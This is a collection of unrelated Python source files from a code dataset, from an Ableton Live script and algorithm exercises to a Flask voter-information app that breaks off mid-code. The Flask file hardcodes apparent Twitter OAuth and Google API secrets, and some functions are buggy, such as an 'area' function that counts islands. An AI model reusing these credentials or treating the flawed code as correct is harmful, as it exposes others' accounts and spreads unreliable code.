False\n\t\tappointed_device = device_to_appoint(device)\n\t\tself._appoint_device(appointed_device)\n\t\tself.song.view.select_device(device, False)\n\t\tself.song.appointed_device = appointed_device\n\n\n\t@singledispatchmethod\n\tdef _on_reselecting_object(self, drum_pad):\n\t\t# debug('_on_reselecting_object drumpad')\n\t\t# if self._modes.selected_mode is u'chain_selection':\n\t\t# \tself._modes.selected_mode = u'default'\n\t\t# else:\n\t\track = drum_rack_for_pad(drum_pad)\n\t\tself._toggle(rack)\n\t\tif rack.view.is_showing_chain_devices:\n\t\t\tfirst_device = self._first_device_on_pad(drum_pad)\n\t\t\tif first_device:\n\t\t\t\tself._select_item(first_device)\n\t\tself.notify_drum_pad_selection()\n\n\t@singledispatchmethod\n\tdef _on_reselecting_object(self, device):\n\t\tdebug('_on_reselecting_object object', self._modes.selected_mode)\n\t\t# if self._modes.selected_mode is u'chain_selection':\n\t\t# \tself._modes.selected_mode = u'default'\n\t\t# \tdebug('just set mode to default...')\n\t\tif liveobj_valid(device) and device.can_have_chains:\n\t\t\tif not device.can_have_drum_pads:\n\t\t\t\tself._toggle(device)\n\t\t\telse:\n\t\t\t\tif self._was_in_chain_mode:\n\t\t\t\t\tself._modes.selected_mode = 'default'\n\t\t\t\t\tself._was_in_chain_mode = False\n\t\t\t\telse:\n\t\t\t\t\tself._show_chains(device)\n\n\t\telse:\n\t\t\tself.bank_selection.set_device(device)\n\t\t\tself._modes.selected_mode = 'bank_selection'\n\n\t@singledispatchmethod\n\tdef _on_pressed_delayed(self, _):\n\t\tpass\n\n\t@singledispatchmethod\n\tdef _on_pressed_delayed(self, device):\n\t\tself._show_chains(device)\n\t\tself._begin_move_device(device)\n\n\t@singledispatchmethod\n\tdef _delete_item(self, pad):\n\t\tpass\n\n\t@singledispatchmethod\n\tdef _delete_item(self, device):\n\t\tdelete_device(device)\n\n\tdef _show_chains(self, device):\n\t\tif device.can_have_chains:\n\t\t\tself.chain_selection.set_parent(device)\n\t\t\tself._modes.selected_mode = 'chain_selection'\n\n\t@listens('back')\n\tdef __on_bank_selection_closed(self):\n\t\tself._modes.selected_mode = 'default'\n\n\t@listens('back')\n\tdef __on_chain_selection_closed(self):\n\t\tself._modes.selected_mode = 'default'\n\n\tdef _exit_chain_selection(self):\n\t\tdebug('last_pressed_button:', self._last_pressed_button_index)\n\n\tdef _update_device(self):\n\t\tif not self._should_select_drum_pad() and not self._is_drum_rack_selected():\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._update_item_provider(self._device_component.device())\n\n\tdef _is_drum_rack_selected(self):\n\t\tselected_item = self._flattened_chain.selected_item\n\t\tinstrument = self._find_top_level_instrument()\n\t\treturn liveobj_valid(selected_item) and isinstance(selected_item, Live.RackDevice.RackDevice) and selected_item.can_have_drum_pads and not liveobj_changed(selected_item, instrument)\n\n\tdef _find_top_level_instrument(self):\n\t\treturn find_if(lambda device: device.type == Live.Device.DeviceType.instrument, self._current_track().devices)\n\n\t@listens('selected_device')\n\tdef _device_selection_in_track_changed(self):\n\t\tnew_selection = self.song.view.selected_track.view.selected_device\n\t\tif self._can_update_device_selection(new_selection):\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._update_item_provider(new_selection)\n\n\tdef _toggle(self, item):\n\t\tview = item.view\n\t\tif view.is_collapsed:\n\t\t\tview.is_collapsed = False\n\t\t\tview.is_showing_chain_devices = True\n\t\telse:\n\t\t\tview.is_showing_chain_devices = not view.is_showing_chain_devices\n\n\tdef _can_update_device_selection(self, new_selection):\n\t\tcan_update = liveobj_valid(new_selection)\n\t\tdrum_pad_selected_or_requested = self.is_drum_pad_selected or self._should_select_drum_pad()\n\t\tif can_update and drum_pad_selected_or_requested:\n\t\t\tif is_empty_rack(new_selection):\n\t\t\t\tcan_update = False\n\t\t\tif can_update and self.is_drum_pad_selected:\n\t\t\t\tcan_update = not is_first_device_on_pad(new_selection, self._flattened_chain.selected_item)\n\t\telif not can_update and not drum_pad_selected_or_requested:\n\t\t\tcan_update = True\n\t\treturn can_update\n\n\tdef _update_item_provider(self, selection):\n\t\tself._flattened_chain.selected_item = selection\n\t\tif not is_drum_pad(selection):\n\t\t\tself._current_track().drum_pad_selected = False\n\t\tself.notify_drum_pad_selection()\n","sub_path":"Live 11 Python Scripts/Aumhaa_Util/device_navigation.py","file_name":"device_navigation.py","file_ext":"py","file_size_in_byte":26543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93538740","text":"def dfs(grid, i, j):\n row = len(grid)\n col = len(grid[0])\n if i < 0 or j < 0 or i >= row or j >= col:\n return\n if grid[i][j] == 1:\n grid[i][j] = 0\n if i > 0 and 0 <= j < col and grid[i - 1][j] == 1:\n dfs(grid, i - 1, j)\n if i < row - 1 and 0 <= j < col and grid[i + 1][j] == 1:\n dfs(grid, i + 1, j)\n if i >= 0 and 0 < j < col and grid[i][j - 1] == 1:\n dfs(grid, i, j - 1)\n if i >= 0 and 0 <= j < col - 1 and grid[i][j + 1] == 1:\n dfs(grid, i, j + 1)\n return\n else:\n return\n\n\ndef max_area_of_islands(grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n\n area = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == 1:\n dfs(grid, i, j)\n area += 1\n\n return area\n\n","sub_path":"all_problems/695. Max Area of Island/max_island_area.py","file_name":"max_island_area.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593428460","text":"import glob\nimport sys\n\nclass FileNameGetter(object):\n def __init__():\n self.group = 'cancer_01'\n self.file_names = []\n\n def process(self):\n file_names = []\n path = self.group + '/*/*CC.OVERLAY'\n for overlay_file in glob.glob(path):\n contents = \"\"\n with open(overlay_file, 'r') as f:\n for line in f.readlines():\n contents += line\n contents = contents.lower()\n try:\n contents.index('calcification')\n file_names.append(overlay_file)\n except:\n continue\n return file_names\n\n def get_file_names(self):\n self.file_names = self.process()\n return self.file_names\n\nF = FileNameGetter()\nF.get_file_names()\n","sub_path":"utils/ddsm_util.py","file_name":"ddsm_util.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"34779689","text":"import requests as rq\nimport re\n\n\ndef motif_depuis_chaine(chaine):\n \"\"\"Crée un motif re avec la première lettre en majuscule ou minuscule.\"\"\"\n premiere_lettre, suffix = chaine[0], chaine[1:]\n return re.compile(\n \"[\" \n + premiere_lettre.upper() \n + premiere_lettre.lower() \n + \"]\" \n + suffix\n )\n\ndef nb_occurences(nom_du_pays):\n \"\"\"Calcul le nombre de fois où le nom du pays apparaît dans sa fiche wikipédia.\"\"\"\n page = rq.get(\"https://fr.wikipedia.org/wiki/\" + nom_du_pays)\n texte = page.text\n motif = motif_depuis_chaine(nom_du_pays)\n return len(motif.findall(texte))\n \n\n\nif __name__ == \"__main__\":\n print(nb_occurences(\"France\"))","sub_path":"Semaine01/occurences_v2.py","file_name":"occurences_v2.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"607503765","text":"import unittest\nfrom fontParts.base import FontPartsError\n\n\nclass TestGroups(unittest.TestCase):\n\n def getGroups_generic(self):\n groups, unrequested = self.objectGenerator(\"groups\")\n groups.update({\n \"group 1\" : [\"A\", \"B\", \"C\"],\n \"group 2\" : [\"x\", \"y\", \"z\"],\n \"group 3\" : []\n })\n return groups, unrequested\n\n # ---\n # len\n # ---\n\n def test_len(self):\n groups, unrequested = self.getGroups_generic()\n self.assertEqual(\n len(groups),\n 3\n )\n groups.clear()\n self.assertEqual(\n len(groups),\n 0\n )\n","sub_path":"Lib/fontParts/test/test_groups.py","file_name":"test_groups.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"106209175","text":"from skimage import morphology\nimport cv2\nimport numpy as np\nimport sys\n\n\ndef get_image():\n size = (w, h) = (100, 100)\n img = np.zeros(size, np.uint8)\n cv2.rectangle(img, (10, 10), (19, 19), (128), -1)\n cv2.rectangle(img, (30, 20), (39, 39), (128), -1)\n cv2.rectangle(img, (40, 30), (49, 49), (128), -1)\n cv2.rectangle(img, (50, 70), (89, 79), (128), -1)\n return img\n\n\ndef show_image(img):\n cv2.imshow('result', img), cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n img = get_image()\n show_image(img)\n\n labels = morphology.label(img, background=0)\n label_number = 0\n while True:\n temp = np.uint8(labels==label_number) * 255\n if not cv2.countNonZero(temp):\n break\n show_image(temp)\n label_number += 1\n\n cv2.destroyAllWindows()\n","sub_path":"explore/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579810203","text":"import os\r\ndef move(n,a='A',b='B',c='C'):\r\n\tif n==1:\r\n\t\tprint('%s --> %s'%(a,c))\r\n\telse:\r\n\t\treturn move(n-1,a,c,b),move(1,a,b,c),move(n-1,b,a,c)\r\n\r\n\r\nk=input('Please input the number.')\r\nprint('\\n\\n')\r\nmove(int(k))\r\nprint('\\n\\nYou may need',2**int(k)-1, 'steps to move the Tower of Hanoi.\\n\\n')\r\n\r\nos.system('pause')","sub_path":"Hanoi.py","file_name":"Hanoi.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"314684023","text":"#!/usr/bin/python\n\n\"\"\"\nwebserver-bottle.py: A webserver that mimics the Interactives platform on iOS and Android. \nRequires the Python Bottle web framework.\n\"\"\"\n\n__author__ = \"Jason Shah\"\n__copyright__ = \"Copyright 2013-2015, Mediafly, Inc.\"\n__version__\t\t= \"1.6\"\n\n\n\nfrom bottle import route, get, post, put, run, static_file, request, response, abort\nfrom pprint import pprint\nfrom json import dumps\nimport re\nimport json\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\n# Helper functions\n### convertAndReformatForJson performs the following transformations:\n### 1. Converts strings from Unicode to UTF-8, as JSON chokes on Python-style Unicode strings\n### 2. Convert mfly://data/image/ prefixes to Placeholder.it links\n### 3. Convert Python True/False/None to JavaScript true/false/{empty string}\ndef convertAndReformatForJson(input):\n\tif isinstance(input, dict):\n\t\treturn {convertAndReformatForJson(key): convertAndReformatForJson(value) for key, value in input.iteritems()}\n\telif isinstance(input, list):\n\t\treturn [convertAndReformatForJson(element) for element in input]\n\telif isinstance(input, unicode):\n\t\tinput = input.replace('mfly://data/image/', 'http://placehold.it/600x600&text=')\n\t\treturn input.encode('utf-8')\n\telse:\n\t\tif (input == True and str(input) == \"True\"):\n\t\t\treturn True\n\t\tif (input == False and str(input) == \"False\"):\n\t\t\treturn False\n\t\tif (input == None):\n\t\t\treturn \"\"\n\t\tif isinstance(input, str):\n\t\t\tinput = input.replace('mfly://data/image/', 'http://placehold.it/600x600&text=')\n\t\treturn input\n\n\n\n\n###\n### Initialization\n###\n# mflyDataInit return value\nmflyDataInit_response = {\n\t'user': \"jdoe@mediafly.com\",\n\t'displayName': \"John Doe\",\n\t'id': \"5559d4a298225972b02301597product82851\",\n\t'item': \"Interactive\",\n\t'osType': \"Development\",\n\t'osVersion': \"6.1.3\",\n\t'appVersion': \"6.1.4.405\",\n\t'deviceId': \"46a5f0630a13a8744e8b5cc6309b46\",\n\t'appId': \"1de8c94235905abbbf7638acce\",\n\t'lastUpdated': \"2014-02-03T07:04:07-06:00\"\n}\n\n\n\n# Load hierarchy into memory\n\njson_file = open('scripts/hierarchy.json')\nhierarchy = convertAndReformatForJson(json.load(json_file))\nisOnline = True\n\n\n#############################\n# Interactive baseline data #\n#############################\n@get('/data/interactive')\ndef getInteractiveData():\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(mflyDataInit_response)\n\n\n\n##########################\n# Save and restore state #\n##########################\nmemory = {}\n\n@get('/data/info/')\ndef getOrPut(key):\n\tmethod = request.query.method\n\tvalue = request.query.value\n\tif method.lower() != \"put\":\n\t\t# Treat as GET\n\t\tif key not in memory.keys():\n\t\t\tabort(404)\n\t\treturn memory[key]\n\telse:\n\t\t# Treat as PUT\n\t\tmemory[key] = value\n\n\n@get('/data/info')\ndef getMany():\n\tprefix = request.query.prefix\n\tif prefix:\n\t\tif sys.version_info.major == 2:\n\t\t\treturn {k:v for (k,v) in memory.iteritems() if k.startswith(prefix)}\n\t\telse:\n\t\t\treturn {k:v for (k,v) in memory.items() if k.startswith(prefix)}\n\telse:\n\t\treturn memory\n\t\t \n\n\n##############\n# Get Folder #\n##############\n\n@get('/data/folder/')\ndef getFolder(id):\n\tif id in hierarchy:\n\t\t# Now lets construct the folder\n\t\tfolder = []\n\t\tthis_folder = hierarchy[id]\n\t\tif this_folder['items']:\n\t\t\tfor itemkey in this_folder['items']:\n\t\t\t\tfolder.append(hierarchy[itemkey])\n\t\t\tresponse.content_type = 'application/json'\n\t\t\treturn json.dumps(folder)\n\t\telse:\n\t\t\tresponse.content_type = 'application/json'\n\t\t\treturn '[]'\n\telse:\n\t\tabort(404, id + ' not found')\n\n############\n# Get Item #\n############\n\n@get('/data/item/')\ndef getItem(id):\n\tif id in hierarchy:\n\t\tresponse.content_type = 'application/json'\n\t\treturn json.dumps(hierarchy[id])\n\telse:\n\t\tabort(404, id + ' not found')\n\n##############\n# Downloader #\n##############\n@get('/data/download/status')\ndef getDownloadStatus():\n\tresponse.content_type = 'application/json'\n\treturn '{ \"progress\": 0.12, \"fails\": 1 }'\n@get('/data/download/status/')\ndef getDownloadStatusForItem(id):\n\tresponse.content_type = 'application/json'\n\treturn '{ \"progress\": 0.5 }'\n\n\n\n###############\n# Collections #\n###############\ncollections = {}\ncollectionsIdCounter = 1\n\n@get('/data/collections')\ndef getCollections():\n\tret = []\n\tfor c in collections:\n\t\tret.append(collections[c])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n@get('/data/createCollection')\ndef createCollection():\n\tglobal collectionsIdCounter\n\n\t_name = request.query.name\n\t_id = str(collectionsIdCounter)\n\tcollectionsIdCounter += 1\n\tobj = {\n\t\t\"id\": _id,\n\t\t\"name\": _name,\n\t\t\"items\": []\n\t}\n\tcollections[_id] = obj\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(obj)\n\n@get('/data/addItemToCollection')\ndef addItemToCollection():\n\t_collectionId = request.query.id\n\t_itemId = request.query.item\n\tif _itemId in hierarchy:\n\t\titem = hierarchy[_itemId]\n\t\tif _collectionId in collections:\n\t\t\tcollection = collections[_collectionId]\n\t\t\tif not \"items\" in collection:\n\t\t\t\tcollection[\"items\"] = []\n\t\t\tcollection[\"items\"].append(item[\"id\"])\n\t\t\treturn \"\"\n\t\telse:\n\t\t\tabort(404, 'Collection ' + _collectionId + ' not found')\n\telse:\n\t\tabort(404, 'Item ' + _itemId + ' not found')\n\n\n@get('/data/collection/')\ndef getCollection(id):\n\tif id in collections:\n\t\t# Construct the response\n\t\tcollection = []\n\t\tfor itemId in collections[id]['items']:\n\t\t\tcollection.append(hierarchy[itemId])\n\t\tresponse.content_type = 'application/json'\n\t\treturn json.dumps(collection)\n\telse:\n\t\tabort(404, id + ' not found')\n\n\n##########\n# Search #\n##########\n\nDO_NOT_SEARCH_LIST = [\"autoStart\", \"id\", \"items\", \"thumbnailUrl\", \"type\", \"url\", \"launched\", \"progress\", \"pages\"]\n@get('/data/search')\ndef search():\n\tterm = request.query.term\n\n\tret = []\n\tfor k in hierarchy:\n\t\tif (k != 'version'):\n\t\t\tfor v in hierarchy[k]:\n\t\t\t\tif not(v in DO_NOT_SEARCH_LIST) and type(hierarchy[k][v]) is str and term in hierarchy[k][v]:\n\t\t\t\t\tret.append(hierarchy[k])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n\n##########\n# Filter #\n##########\n@get('/data/filter')\ndef filter():\n\tret = []\n\n\tfor k_id in hierarchy:\n\t\tif (k_id != 'version'):\n\t\t\tfoundcount = 0\n\t\t\tfor key in request.query:\n\t\t\t\t# Loop through each of the key=value queryparams and test each key=value combination\n\t\t\t\tval = request.query[key]\n\t\t\t\tif (val.startswith('\"') and val.endswith('\"')):\n\t\t\t\t\tval = val.strip('\"')\n\t\t\t\telif (val == 'true'):\n\t\t\t\t\tval = True\n\t\t\t\telif (val == 'false'):\n\t\t\t\t\tval = False\n\n\t\t\t\tfor k_key in hierarchy[k_id]:\n\t\t\t\t\tif (key == k_key):\n\t\t\t\t\t\tif str(val) == str(hierarchy[k_id][k_key]):\n\t\t\t\t\t\t\tfoundcount = foundcount + 1\n\t\t\t\t\t\t\tbreak\n\t\t\t# We found each of the key=value combinations for this object k_id\n\t\t\tif foundcount == len(request.query):\n\t\t\t\tret.append(hierarchy[k_id])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n\n\n#########\n# Embed #\n#########\n# To work with Embed, place the item that will be embedded into the\n# [Interactive root]/embeds folder with the same name as the ID of the item.\n# Images will be of the form [id].png.\n# Other interactives will be of the form [id], where [id] is a folder, and\n# within that folder is, at least, index.html.\n# Data items (JSON, CSV, XML) will be of the form [id] with no extension\n# Pages of documents will be of the form [id]/[page].png, where [id] is a\n# folder, and [page].png is the specified page of the document as a PNG image.\n@get('/data/embed/')\ndef embed(id):\n\tif id in hierarchy:\n\t\tif hierarchy[id]['type'] == 'image':\n\t\t\t# XXX TODO Generalize this for all images. And return a default image if the specific one doesn't exist.\n\t\t\treturn static_file(id + '.png', root='embeds')\n\t\telif hierarchy[id]['type'] == 'zip':\n\t\t\treturn static_file(id + '/index.html', root='embeds')\n\t\telif hierarchy[id]['type'] == 'data':\n\t\t\treturn static_file(id, root='embeds')\n\t\telif hierarchy[id]['type'] == 'pdf':\n\t\t\treturn static_file(id + '/' + request.query.position + '.png', root='embeds')\n\telse:\n\t\tabort(404, id + ' not found')\n\n\n###############\n# Other calls #\n###############\n\n\n@get('/data/onlineStatus')\ndef getOnlineStatus():\n\tisOnlineString = 'online' if isOnline else 'offline'\n\tresponse.content_type = 'application/json'\n\treturn '{ \"status\": \"' + isOnlineString + '\" }'\n\n\n\n#############\n# Heartbeat #\n#############\n@get('/_heartbeat')\ndef hearbeat():\n\tglobal isOnline\n\tif (request.query.isOnline != ''):\n\t\tisOnline = True if (request.query.isOnline == 'true') else False\n\n\tseq = int(request.query.seq)\n\tif seq == 0:\n\t\treturn \"mflyDataInit(\" + str(json.dumps(mflyDataInit_response)) + \")\"\n\telif seq == 1:\n\t\treturn \"mflyResume()\"\n\telif seq == 2:\n\t\treturn 'mflyInit(' + str(json.dumps(hierarchy)) + ')'\n\treturn ''\n\n\n\n#################\n# Static Routes #\n#################\n@get('/')\ndef index():\n\treturn static_file('index.html', root='app/')\n\n@get('/js/')\ndef javascripts(filename):\n\treturn static_file(filename, root='app/js')\n\n@get('/bower_components/')\ndef bower(filename):\n\treturn static_file(filename, root='app/bower_components')\n\n@get('/lib/')\ndef js_libraries(filename):\n\treturn static_file(filename, root='app/lib')\n\n@get('/css/')\ndef stylesheets(filename):\n\treturn static_file(filename, root='app/css')\n\n@get('/img/')\ndef images(filename):\n\treturn static_file(filename, root='app/img')\n\n@get('/fonts/')\ndef fonts(filename):\n\treturn static_file(filename, root='app/fonts')\n\n\n\nrun(host='127.0.0.1', port=8000, debug=True, reloader=True)\n\n","sub_path":"examples/Sync status/scripts/webserver-bottle.py","file_name":"webserver-bottle.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93982861","text":"#!/usr/bin/env python3\nfrom os import path\nbirthdayfile = \"birthdays.json\"\nif path.exists(birthdayfile):\n print(\"Welcome to the birthday dictionary. We know the birthday of:\")\n # Create empty dictionary object to hold birthdays\n mydict = {}\n with open(birthdayfile) as birthdays:\n for data in birthdays:\n splitdata = data.split(\":\")\n name = splitdata[0]\n birthday = splitdata[1]\n mydict[name] = birthday\n print(name)\n\n val = \"\"\n while len(val) == 0:\n req = input(\"Whose birthday do you want to look up? \")\n req = req.title()\n try:\n val = mydict[req]\n print(f\"{req}'s birthday is on {val}\")\n except:\n print(f\"{req} not found in the dictionary\")\n","sub_path":"practicepython/ex33-part2.py","file_name":"ex33-part2.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166155706","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport logging\nimport re\n\nfrom urlparse import urlparse, urljoin\nfrom bs4 import BeautifulSoup\nfrom os import environ\nfrom dotenv import load_dotenv, find_dotenv\n\nclass ParserLinks(object):\n\n @classmethod\n def extract_urls(cls, url_curr, html):\n load_dotenv(find_dotenv(usecwd='..')) \n \n SCHEME = environ.get('SCHEME') \n links = []\n\n def internal_links(link):\n \n def external_links(link):\n \n link = re.sub(r\"^http(s)?://\", '', link)\n link = re.sub(r\"/$\", '', link)\n return link\n \n if not re.search(r\"^http\", link):\n link = urljoin('{scheme}{host}'.format(scheme=SCHEME, host=url_curr), link)\n link = re.sub(r\"^http(s)?://\", '', link)\n link = re.sub(r\"/$\", '', link)\n else:\n link = external_links(link)\n\n return link\n\n try: \n parser = BeautifulSoup(html, 'lxml')\n\n for a in parser.find_all('a'):\n\n if a.has_attr('href'):\n link = a.get('href')\n link = internal_links(link)\n # if not re.search(r\"^http\", link):\n # link = urljoin('{scheme}{host}'.format(scheme=SCHEME, host=cls.url_curr), link)\n \n # link = re.sub(r\"^http(s)?://\", '', link)\n # link = re.sub(r\"/$\", '', link)\n links.append(link)\n\n return links\n \n except Exception as error:\n\n if hasattr(error, 'message'):\n logging.error('extract_urls.py --> {}'.format(error.message))\n\n return links\n","sub_path":"www_traveler/extract_urls.py","file_name":"extract_urls.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"334515491","text":"import flask\nimport twitter\nfrom flask import Flask, request, render_template\nfrom twitter import *\nimport json\nimport requests\nimport pandas as pd\nimport numpy as np\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nOAUTH_TOKEN=\"2464717370-ztIheNqKFIr9ll1ZG3OEa1SxRPTGY8k1XL3Ukj0\"\nOAUTH_SECRET=\"doEQPqBTLo22FrakNfY2q3jdLJyary6TFcLT8sv8AJes7\"\nCONSUMER_KEY=\"0J1e4CLZOLJTG1fVQaQya4fH1\"\nCONSUMER_SECRET=\"SUZK3xOyW4DJzY0rqr8pr2PQuVjEjEPgUNd73fMYd5eXSg4sY9\"\n\ntwitter = Twitter (\n\tauth=OAuth(OAUTH_TOKEN, OAUTH_SECRET, CONSUMER_KEY, CONSUMER_SECRET)\n)\n\ndef model(user_df):\n\n total_df = pd.read_csv('./data/total.csv')\n stop_words = set(stopwords.words('english'))\n \n def pre_process(mess):\n mess = nltk.word_tokenize(mess)\n clean = [word.lower() for word in mess if word.lower() not in stop_words]\n return clean\n\n def piped_vect(X,y,user_x):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) \n text_clf = Pipeline([('vect', CountVectorizer(analyzer=pre_process,encoding='utf-8',strip_accents=['ascii','unicode'],max_df=0.8,min_df=0.3)),('tfidf',TfidfTransformer()),('clf', MultinomialNB()),])\n text_clf = text_clf.fit(X_train, y_train)\n predicted = text_clf.predict(user_x)\n return predicted\n\n pred = piped_vect(total_df['Tweets'],total_df['pol'],user_df['Tweets'])\n return pred\n\napp = Flask(__name__)\n\n@app.route('/', methods=['POST'])\n\ndef form_input():\n\tif request.method == 'POST':\n\t\tscreen_name = request.form['screen_name']\n\t\tlocation = request.form['location']\n\n\t# user_tweets = twitter.statuses.user_timeline(count=1000, screen_name=screen_name)\n\n\tdata = {'Sources': [], 'Tweets': []}\n\tdata['Sources'].append(screen_name)\n\n\ttlist = []\n\n\tfor t in twitter.statuses.user_timeline(count=1000, screen_name=screen_name, tweet_mode=\"extended\"):\n\t\ttlist.append(t['full_text'].encode(\"utf-8\"))\n\tdata['Tweets'].append(tlist)\n\n\tdf = pd.DataFrame(data, columns=['Sources', 'Tweets'])\n\n\t# app.logger.debug(itpTweets)\n\n\t #DF IS THE IMPORTANT DATAFRAME\n\t #DF->MODEL\n\tpred = model(df)\n\t \n\taddress = location\n\n\tparams = {\n\t\t'address': address,\n\t}\n\n\tr = requests.get(\"https://www.googleapis.com/civicinfo/v2/voterinfo?key=AIzaSyCDTh1Io4GW47gv12B5cEqOV6uA93Hx6Ew\", params=params)\n\tdata = r.json()\n\telection = data['election']['name']\n\tif 'pollingLocations' in data:\n\t\tpolling_places = data['pollingLocations']\n\telse:\n\t\tpolling_places = []\n\tpolling_places_list = []\n\tif 'earlyVoteSites' in data:\n\t\tearly_vote_sites = data['earlyVoteSites']\n\telse:\n\t\tearly_vote_sites = []\n\tearly_vote_sites_list = []\n\tcontests = data['contests']\n\tcontest_type = []\n\tcontest_office_federal = []\n\tcontest_office_state = []\n\tcontest_office_local = []\n\tcontest_candidates_federal = []\n\tcontest_candidates_state = []\n\tcontest_candidates_local = []\n\tfor contest in contests:\n\t\tif 'type' in contest:\n\t\t\tcontest_type.append(contest['type'])\n\t\tif 'level' in contest:\n\t\t\tif 'country' in contest['level']:\n\t\t\t\tcontest_office_federal.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + \"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_federal.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_federal.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\t\t\telif 'administrativeArea1' in contest['level']:\n\t\t\t\tcontest_office_state.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + \"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_state.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_state.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\t\t\telse:\n\t\t\t\tcontest_office_local.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + \"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_local.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_local.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\n\tfor place in polling_places:\n\t\tpolling_places_list.append({'name': place['address']['locationName'], 'street_address': place['address']['line1'], 'city': place['address']['city'], 'state': place['address']['state'], 'zip': place['address']['zip']})\n\n\tfor site in 